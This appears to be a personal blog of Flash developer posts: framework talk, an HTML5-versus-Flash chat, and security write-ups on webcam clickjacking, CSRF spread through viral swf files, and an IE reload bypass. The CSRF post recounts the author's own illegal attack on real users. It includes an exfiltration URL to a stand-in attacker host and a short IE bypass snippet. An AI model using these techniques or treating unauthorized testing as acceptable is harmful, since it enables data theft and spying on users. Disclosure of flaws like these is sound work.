My PureMVC presentation

Posted on by
13

When it comes to enterprise application it’s difficult to recommend  project owners to bet on a framework that hasn’t proved itself for a long time. So all these sexy new frameworks with their lovely IoC will have to excuse us for now. That leaves us with cairngorm (yeah, I’ve heard the rumors) and PureMVC which is better IMHO and many others HO.

Recently, I’ve made this presentation about PureMVC, targeted to a specific enterprise application. These are most of the slides from the presentation.

Generally, the topics are:

  • Why use an application framework?
  • Why choose PureMVC?
  • The PureMVC meta pattern
  • PureMVC cons
  • Can we SCRUM it?
PureMVC
View more presentations from guya1.

HTML 5 vs Flash vs SilverLight

Posted on by
11

This is by no mean a full technical comparison between these technologies, just a chat between 2 geeks. One is a skeptic backend dude ;) and the other one is yours truly, a GUI guy.

It started with an email from Eli (the backend dude)  titled “the Next big thing”?

Elihttp://www.chromeexperiments.com/ , RIP Flash. Long live HTML 5 + JavaScript.

Guy: This is old…  Let me know when Chrome will reach 99% of desktop computers.

Eli:  HTML 5 is old? LOL.  FYI, despite the fact that the spec is far from being finalized, browsers with sparks of HTML 5 support count among them ie8, ff3, opera and safari.

Guy:  Old news, that is.  HTML 5 is only started to get supported.   HTML 5 + Javascript has a small subset of what Flash 10 can offer.  By the time HTML 5 will be a standard Flash 12 will reach 90%

Eli:  Yeah, yeah, I’ve heard the same thing about java applets about a decade ago… ;)   Seems like the simplicity of markup languages makes them the long distance runners

Guy:  Exactly, Flash has succeeded where Java failed. Flash has a lot of issues, but currently (and in the few coming years for sure) it’s the most powerful and available runtime.  HTML + Javascript is far from simple and cause huge problems for complex applications.

Eli:  Flash is mostly used to fill gaps in HTML, not to solve the huge problems in the complex applications the web is made of, isn’t it?

Guy:  This is what Adobe aim to solve with Flash, to be the ultimate platform for creating and running RIA (Rich Internet Applications). Still, a lot of RIAs are written in AJAX (Javascript+HTML), which, with the aid of solid and powerful frameworks like jQuery become reasonable in some cases. Lately Google, which already have a lot of RIA tools, is trying to change the game with its Chrome browser and OS. The Chrome browser is equipped with a much faster JavaScript engine that enables what we can see in chromeexperiments.com. Microsoft is also trying to be a player in this space with its new SilverLight runtime.

Eli:  Yet, the idea of basing the web on some proprietary browser plug in is doubtable. Epic fall of java applets and endless annoying ActiveX bullshit are just a couple of examples. IMHO, the shortcoming of this approach is missing the idea that The Web is more than “screenfuls of text and graphics” ©. Layout engines, however, are here for more than a decade and markup languages – for ages, proving themselves in taking the web into the places no one was thinking then about.

P.S. The only thing Adobe aims is profit.

P.P.S. I love holy wars.

Guy:  The proprietary thing is indeed an issue, it prevents Flash from being accepted in some areas of the web and by some users. E.g. the Wikipedia video project uses HTML 5 video, they can’t use anything that is closed. What prevents Flash from being open-sourced is that it contain 3rd party patent not owned by Adobe. Adobe is already trying to appeal to the open source crowed with the opening of some of its IP http://opensource.adobe.com. IMHO they might completely open the Flash runtime if and when it’ll be pushed to the wall by Microsoft and its new SilveLight (talking about proprietary ;) .

Java and Active-X are completely different stories, each had its own reason to fail. Partially and shortly, it is too difficult to create a Java applet and its far from appealing to a designer. Active-x has no sandbox, hence it has a lot of security issues, and also runs only in IE.

HTML was created to display text and images with basic layout, Javascript was added to enable simple interactivity, no one dreamt it can be used the way it’s done today. Only with the maturity of the browsers and with specialization of web developers, these king of RIAs could have been created. Yet it still pushes the tech to it limits.

The HTML 5 standard will be adopted relatively fast, but we’re still talking in years. Even with the Chrome JS engine (V8), Javascript can’t match the power of languages like Actionscript 3.0 and C#. Javascript 2 is somewhere in the very distant future. HTML 5 biggest improvement is the support for media (video/audio). But, it still can’t compete with Flash and SilverLight media abilities, in terms of playback and deployment.

HTML 5 is nice but the main holy war is between the reigning RIA world champion which is Adobe Flash and the challenger which is Microsoft SilverLight. There is much to be loved about this holy war, since it pushes the technologies forward and the biggest winners are us, the developers and the users.

(I’m talking about hard-core RIA, not some lightbox image gallery which is still preferably done in HTML)

P.S.  Adobe isn’t a saint, but, everyone want to make some profit, even google, even us as I recall ;) If you gain it morally and also use it to make something like the web better, than it’s fine with me. 

P.S.S aforementioned.

The biggest terrorists in the world are… Flex bloggers

Posted on by
8

Adrian Parr, a Flex blogger mostly known for his post listing of AS3 frameworks got hacked by some political lamers. The whole blog is replaced with common and lame hacker page. The allegedly hackers came from this Arab security forum, m4r0c-s3curity.cc.

What is the relation of this blog to your “war on terror”?! Leave your political BS where it belongs.

So what is Flex then, again?!

Posted on by
5

With the release of the new Flash Builder 4 beta yesterday, it’s my chance, again, to congrat Adobe on the name change.

Yeah I know this is old news, Flex builder has been rebranded to Flash Builder. I just wanna join the people who welcomed it.
Flex sounded more serious then Flash so, it served it’s purpose as a marketing term for showing the maturity of the Flash platform. Confused already?!
I know a lot of people were and probably still are. Even seasoned Flash/Flex developers weren’t sure want is going on.
I’ve heard comments like – “Flex is what competing with SilverLight and not Flash.” Which is obviously wrong.

I really wonder why it’s so difficult to understand, it’s not that complicated. If you feel like you still don’t get it then, read this.

Of course some people think this change is a terrible mistake, these are mostly the people who the name Flex was meant to attract and will rather die in pain then to say they’re Flash developers. – You can still be a Flex developer, you know!
Some raise none important questions,  to say the least, like – will the new logo retain it’s colors? – yes it does, yes it does.

I mostly like the change because, it reduces the pain of trying to explain common people what is Flex.
- “There is the Flex Builder and the Flex framework.” Here you probably lost most of them already. And you end with – “but anyway everything is compiled into Flash.” – “Aha, so what is Flex then, again?!”

Here is a screencast about the name change that also showoff the new builder.

Anyway it’s time to get busy with the new toys:

Get Flash Builder 4 Beta

What’s new in Flash Builder 4 beta

What’s new in Flex 4 SDK beta

Get Flash Catalyst

Flash Builder 4, Flex SDK4 and Flash Catalyst tutorial and demonstration videos

gotoAndLearn() Flash Catalyst and Flex 4: Part 1, Part 2

Hundred million breaths of fresh AIR

Posted on by
Reply

Lately I was wondering how well is AIR doing, has it lived to its promise of compatibility? Today passing through the technical default, Techcrunch, I found out it’s already been installed on 100,000,000 machines in less then a year of existence. Looking at it with most pessimistic assumptions (double installs etc’) still make it a decent number.

Hopefully Adobe will continue to push and improve this cool runtime as vigorously as they did so far.

Google Hackathon was hacked

Posted on by
3

Two days ago, the first Israeli Google Developer Day was held. It was a colorful and interesting event, to the best of google tradition.

Yesterday, all attendees got an email saying that an unauthorized network activity was detected.

“We identified unauthorised activity on the public wired Ethernet network which was provided by the convention centre for conference attendees to access the Internet.”

Beside the interesting lectures there were two code-labs or hackathons going on. The first thing that came to my mind when I saw everyone are connecting their laptops, wirelly and wirelessly, is that someone will abuse this for some king of Man in the middle attack. But for some reason I thought that since it’s google, they won’t let something like this to happen.

Just minutes before, I asked the google experts over there, which are very nice and professional in there own fields, about the GMail Frame Injection issue. I wasn’t accusing anyone just trying to raise a discussion about it. It seemed that no one knew about it and no one really cared. The suggestion I got was that I should report this somewhere in the GMail website. But, it’s already been reported, I protested.

I should have understood by this, that security isn’t the first priority of these uber geeks.

Maybe we’re expecting too much from google, they’re just the greatest company they’re not gods.

Anyhow I wasn’t hurt by this since I don’t transfer sensitive non encrypted data in these kind of places. And it might be that google is just covering themselves just in case someone got hurt. And most users weren’t really affected.

On a side note, I’ve allowed myself to “analyze” the google dev crowd, I’d expected them to be in higher level then, for example, the Microsoft crowd.

Indeed, in a rough inclusion, the google crowd is much geekier and also much more nerdish, as opposed to the Microsoft crowd, especially here in Israel :D . It can be said that MS is much more approachable and that they create tools that anyone can use, or that MS is aiming to the lowest common denominator, or that everything is political. I don’t care. All I know is that I don’t feel belonging to any of these. The google crowd is too smart nerdish and MS crowd is too… how to say it politely… too stupid common.

I’m somewhere in the creative outskirt, I’m in the Flash crowd :)

P.C. Not that it’s anything wrong about it to be a common .Net developer, a lot of my best friends are .Net developers ;)

Malicious camera spying using ClickJacking

Posted on by
101

Update: Adobe has fixed this issue by framebusting the Settings Manager pages. Now, 99.9% of the users are protected from this specific exploit. Congrats on the fast response. —-

Turn every browser into a surveillance zombie. The wet dream of every private eye and peeping tom. Imagine this scenario, you play a short game on the web and by doing that you unknowingly grant someone full access to your webcam and microphone.

I’ve made a live demo of it in here, this demo won’t listen or record any of your input.

If you don’t want to try it or don’t have a webcam connected, then check out the video.

[kml_flashembed movie="http://www.youtube.com/v/gxyLbpldmuU" width="450" height="376" /]

When I’ve first heard about ClickJacking and how Adobe is concerned about it, I thought that the Flash Player Security Dialog must have been compromised. But the Security Dialog does a good job disabling itself when you try to mess with it’s visibility through DHTML. Unless there’s some 0-day issue with the Dialog it’s probably relatively safe.

The problem here is the Flash Player Setting Manager, this inheritance from Macromedia might be the Flash Player security Achilles heel.

I’ve written a quick and dirty Javascript game that exploit just that, and demonstrate how an attacker can get a hold of the user’s camera and microphone. This can be used, for example, with platform like ustream, justin and alike or to stream to a private server to create a malicious surveillance platform.

I’ve made it as a JS game to make it easier to understand, but, bear in mind that every Flash, Java, SilverLight, DHTML game or application can be used to achieve the same thing.

Some of the clicks are real game clicks other are jacked clicks. Every time the click is needed to be jacked the content simply move behind the iframe using z-index

I had doubts about publishing this, but, if I could have understand it so are the bad guys, so it’s better to know about it.

In this case Adobe could have just framebust the pages that holds the Settings Manager. There are two issues with frambusting in this case, it won’t solve all cases (legacy browsers for ex) and will force Adobe to rely on javascript.

Play it here, watch it here

Thanx for not killing the Flash clipboard

Posted on by
Reply

Recently, a questionable Flash feature of writing to the user’s clipboard has been exploited. Adobe will finally fix this feature and it’ll require user interaction (mouse/keyboard click) in the upcoming Flash 10.

IMHO the people in charge of the Flash Player security have chosen the best option, retaining the functionality of the feature and still keeping the users secured.

Of course, a user can be led to click on the malicious Flash movie, or focus to the movie can be set and any keyboard press will lead to a pollution of the clipboard.

A more strict security measure could have been chosen, a dialog box asking the user to permit clipboard writing, could have been implemented. The Flash Player already uses a similar dialog when interacting with the user’s camera and mic. An updated Internet Explorer uses a dialog when interacting with the clipboard, allowing both read and write.

javascript:clipboardData.setData(“text”, “I’m in the clipboard”); (IE only)

 IE_clipboard

But, using the later option will make this feature too annoying for the user, and mostly useless.

Thanx for not killing this feature but still making it secure enough.

Regarding Flash movies that’ll still try to exploit this feature. It’s up to AD distributors and website owners to do their part and not distribute or host malicious files.

Encapsulating CSRF attacks inside massively distributed Flash movies – Real world example

Posted on by
14

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widely spread exploits in websites today. I’ve written before about how a legitimate Flash file (swf) can be extremely viral. Few days ago I did a real attack, exploiting a CSRF flaw and elaborated it using the nature of Flash virality. The result shocked me.

I have a confession, I sometime look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the script I examine, these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignore it. I had the honor to find a very lame CSRF flaw in a big website which I’m familiar with it’s owners and some of its users. It was a great opportunity to do a real world test on this exploit. In the exploit I found, the attacker can obtain a lot of personal information from the user. A famous CSRF of similar nature has happened to gmail. Bear in mind that this kind of test is illegal and you should always be sure you won’t get in trouble, or just hide very well ;)

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user that’ll view it, if the attack is successful and the user data is stolen it’ll be posted to my database (I’ll review the technical details at a latter point). I’ve then, uploaded the file to a server and sent the link to a few users that I know that uses that website, making it look like a naive chain letter.

pug_csrf

Then, I’ve waited for the stolen data to appear in my  database. It was exiting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I haven’t directly sent them the email. It was a proof of the virality of the attack.

csrf_db_table_01t

I was shocked when I saw that some of the users were added to my database being attacked from other servers then mine. This has proved the main point of the test, that attacks inside Flash (swf) files aren’t only viral but also get distributed. I wanted to show that this can happen pointing the screenclean.swf which can be found on ~600 different locations. I’ve never imagined that’ll it’ll happen so fast with my test, and on such an old movie.

After a few hours I’ve pulled the plug on this test and changed the swf file to the harmless original. But it was already too late the swf file got re-distributed (copied to other servers). Since I didn’t set the attack to expire and hasn’t obfuscate the code inside it, It was still attacking users, and worse, someone can look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Beside the virality nature of these kind of Flash videos and games, swf files gets redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an html page.

- Script is hidden inside the Flash (swf), won’t be seen even with “View Generated Source”. Can be obfuscated inside the swf as well. Unless you’re watching the traffic you’ll see nothing suspicious.

- Multiple attacks in one swf. If it’s a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker server.

- Attack can be manipulated according to the date and time. For ex, let the swf distribute for a few days before starting to attack, set the attack to expire to make it more stealthy.

- Use shared object (Flash cookie) to maintain the user hacked status, more consistent then a cookie.

- Stealing large amount of data is easier as the data can be taken back to the swf and cross-domain Post can be used instead of Get.

Technical info

First of all, what enable this attack is the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user data on his behalf, as described here. The flaw I’ve found is returning live Javascript object with lots of personal data, similar to what happened to gmail. It was done this way, I guess, for ease of development, every page that is authenticated can load the url http://victim.com/personal.php?random and get the user’s data ready for any javascript code on the page, for ex, personalData.email.

The way that browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that’ll load a url from this domain inside a script tag will use the authentication, even if the main page is on different domain. A script tag is one of these rare elements that are exempt from the browsers cross-domain-policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf is “injecting” a javascript code to the page. This javascript is manipulating the page’s DOM and dynamically creating a script tag, this script is loading the vulnerable url as it source. Most of CSRF attacks will be done at this point, but, since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it as a string only with the important data then save it to our server database using the dynamically c
reated script with a get parameter http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then post it to our server, Flash can do a cross-domain post as opposed to Javascript, might be more efficient when dealing with a large amount of data.

If the attack is successful we save it as a cookie, so we won’t attack the same user more then once. Again, we might consider using a Flash shared object which have more consistency.

Fixing the flaw in the website was just a matter of changing the returned data to a raw JSON instead of a live Javacript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summery

Generally users feel comfortable following links, thinking it’s safe since they’re not installing anything, all the more so when it comes to links for flash and images.

This kind of attack is easy to reproduce, an attacker can simply go to youtube, download the FLV of the coolest short video and repeat the process, or worse, put it inside of an addictive game.

There is a tendency to accuse the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly, IE already tries to do it but fails miserably. That won’t solve any scenario though, since the harmful swf can be naively embedded inside an html page with scripting set to be allowed.

It’s always up to the developer to develop secure websites and applications without any CSRF or other type of flaws. No matter how strict is the platform (in this case the browsers and the Flash player), a “good” developer will be able to break the toughest security model in a second by writing vulnerable script.

It up to the developer to be a Safeloper and to produce secure applications ;)

The users should be able to feel safe following a link they get in an email message, it’s part of the nature of the Internet, following links that is.

I also did a similar attack using a JPG but that’s a different story.

Bug in Internet Explorer security model when embedding Flash

Posted on by
9

Update: I’ve posted a real world example of this bug being exploited.

This one has the same behavior on IE6, IE7 and IE8 betas.

I have only tested this with Flash swf files, but it’s likely that this security is applied and broken the same way, when navigating to different types of files.

When loading Flash file (swf) directly inside the browser without an html page container, for ex: http://example.com/game.swf , most browsers create an html page automatically and embed the swf inside it. FireFox and Google Chrome, for that matter, automatically create an embed tag with some default values, and IE uses this mshtml script (res://mshtml.dll/objectembed_neutral.js) to load the object.

The fact that this automatically created embed tag doesn’t mention the allowscriptaccess property it’s defaulted to samedomain. This way the swf file can script the automatically generated html page it resides in, using ExternalInterface, leading to a major security flaw. I will post about a real world example of this security flaw, shortly.

Internet Explorer, rightfully, consider this generated page as less secure and as such restrict access to the JavaScript document object. It’s preventing from the embedded swf to script the DOM of the page.

Just test it, go to any swf file on the web using Internet explorer, then run this script in the address bar javascript:alert(document); you’ll see the error “Access is denied”. Touching the document is prohibited!

Error_Access_Denied

But, all that is needed to compromise this security feature in IE is to reload the page. That’s it, just reload the page once by pressing F5. Run the script again javascript:alert(document); you’ll see the precious document and no error will be thrown.

Since most of the other javascript objects are still available and among these is the window native object. A swf file, for example, can reload the page on its own using window.location.reload() and then will be able to bypass the restriction and freely manipulate the page.

This script can run from inside the swf using ExternaInterface.call(“eval”, “script”); If the “try” clause fail it’s probably an IE browser and the page will reload immediately without the user noticing. The 2nd time the page loads the “try” clause won’t fail.

try{
   $d = document;
   //Mess with the DOM
}catch(ex){
   window.location.reload();
}

I was impressed that Microsoft implemented such a security feature as opposed to FireFox, Chrome and others who don’t have a similar restriction. but, it needs to be done right otherwise it misses the point.

As I said, I’ll post a real world example of this being exploited, soon.